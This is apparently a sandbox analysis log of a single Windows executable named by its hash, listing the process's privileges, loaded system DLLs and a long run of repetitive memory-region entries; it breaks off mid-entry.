# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Apr 12 2018 14:32:59 # Log Creation Date: 10.07.2018 04:53:47.292 Process: id = "1" image_name = "f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe" page_root = "0xe1dd000" os_pid = "0xb14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2 start_va = 0x84b0ea0000 end_va = 0x84b0ebffff entry_point = 0x0 region_type = private name = "private_0x00000084b0ea0000" filename = "" Region: id = 3 start_va = 0x84b0ec0000 end_va = 0x84b0ed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b0ec0000" filename = "" Region: id = 4 start_va = 0x84b0ee0000 end_va = 0x84b0fdffff entry_point = 0x0 region_type = private name = "private_0x00000084b0ee0000" filename = "" Region: id = 5 start_va = 0x84b0fe0000 end_va = 0x84b0fe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b0fe0000" filename = "" Region: id = 6 start_va = 0x84b0ff0000 end_va = 0x84b0ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b0ff0000" filename = "" Region: id = 7 start_va = 0x84b1000000 end_va = 0x84b1001fff entry_point = 0x0 region_type = private name = "private_0x00000084b1000000" filename = "" Region: id = 8 start_va = 0x7ff6bf510000 end_va = 0x7ff6bf532fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6bf510000" filename = "" Region: id = 9 start_va = 0x7ff6bf53d000 end_va = 0x7ff6bf53dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6bf53d000" filename = "" Region: id = 10 start_va = 0x7ff6bf53e000 end_va = 0x7ff6bf53ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6bf53e000" filename = "" Region: id = 11 start_va = 0x7ff6c01f0000 end_va = 0x7ff6c022afff entry_point = 0x7ff6c01f0000 region_type = mapped_file name = "f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe") Region: id = 12 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 159 start_va = 0x84b11c0000 end_va = 0x84b12bffff entry_point = 0x0 region_type = private name = "private_0x00000084b11c0000" filename = "" Region: id = 160 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 161 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 162 start_va = 0x84b0ea0000 end_va = 0x84b0eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b0ea0000" filename = "" Region: id = 163 start_va = 0x84b1010000 end_va = 0x84b10cdfff entry_point = 0x84b1010000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 164 start_va = 0x7ff6bf410000 end_va = 0x7ff6bf50ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6bf410000" filename = "" Region: id = 165 start_va = 0x7ffbff0d0000 end_va = 0x7ffbff147fff entry_point = 0x7ffbff0d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 166 start_va = 0x84b0eb0000 end_va = 0x84b0eb6fff entry_point = 0x0 region_type = private name = "private_0x00000084b0eb0000" filename = "" Region: id = 167 start_va = 0x84b12c0000 end_va = 0x84b13bffff entry_point = 0x0 region_type = private name = "private_0x00000084b12c0000" filename = "" Region: id = 168 start_va = 0x7ff6bf53b000 end_va = 0x7ff6bf53cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6bf53b000" filename = "" Region: id = 169 start_va = 0x7ffbffad0000 end_va = 0x7ffbffaebfff entry_point = 0x7ffbffad0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 170 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 171 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 172 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 173 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 174 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 175 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 176 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 177 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 178 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 179 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 180 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 181 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 182 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 183 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 184 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 185 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 186 start_va = 0x84b10d0000 end_va = 0x84b10d6fff entry_point = 0x0 region_type = private name = "private_0x00000084b10d0000" filename = "" Region: id = 187 start_va = 0x84b1160000 end_va = 0x84b116ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1160000" filename = "" Region: id = 188 start_va = 0x84b13c0000 end_va = 0x84b1547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b13c0000" filename = "" Region: id = 189 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 190 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 191 start_va = 0x84b10e0000 end_va = 0x84b10e0fff entry_point = 0x0 region_type = private name = "private_0x00000084b10e0000" filename = "" Region: id = 192 start_va = 0x84b10f0000 end_va = 0x84b10f0fff entry_point = 0x0 region_type = private name = "private_0x00000084b10f0000" filename = "" Region: id = 193 start_va = 0x84b1550000 end_va = 0x84b16d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1550000" filename = "" Region: id = 194 start_va = 0x84b16e0000 end_va = 0x84b2adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b16e0000" filename = "" Region: id = 1530 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1762 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2374 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2612 start_va = 0x84b2ae0000 end_va = 0x84b2e16fff entry_point = 0x84b2ae0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2613 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3498 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3513 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3514 start_va = 0x84b1100000 end_va = 0x84b1127fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3515 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3516 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3517 start_va = 0x84b1130000 end_va = 0x84b1155fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3518 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3519 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3520 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3521 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3522 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3523 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3524 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3525 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3526 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3527 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3528 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3529 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3530 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3531 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3532 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3533 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3534 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3535 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3536 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3537 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3538 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3539 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3540 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3541 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3542 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3543 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3577 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3578 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3579 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3580 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3581 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3582 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3583 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3584 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3585 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3586 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3587 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3588 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3589 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3590 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3591 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3592 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3593 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3594 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3595 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3596 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3597 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3598 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3599 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3600 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3601 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3602 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3603 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3604 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3605 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3606 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3607 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3608 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3609 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3610 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3611 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3612 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3613 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3614 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3615 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3616 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3617 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3618 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3619 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3620 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3621 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3622 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3623 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3624 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3625 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3626 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3627 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3628 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3629 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3630 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3631 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3632 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3633 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3634 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3635 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3636 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3637 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3638 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3639 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3640 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3641 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3642 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3643 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3644 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3645 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3646 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3647 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3648 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3649 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3650 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3651 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3652 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3653 start_va = 0x84b1100000 end_va 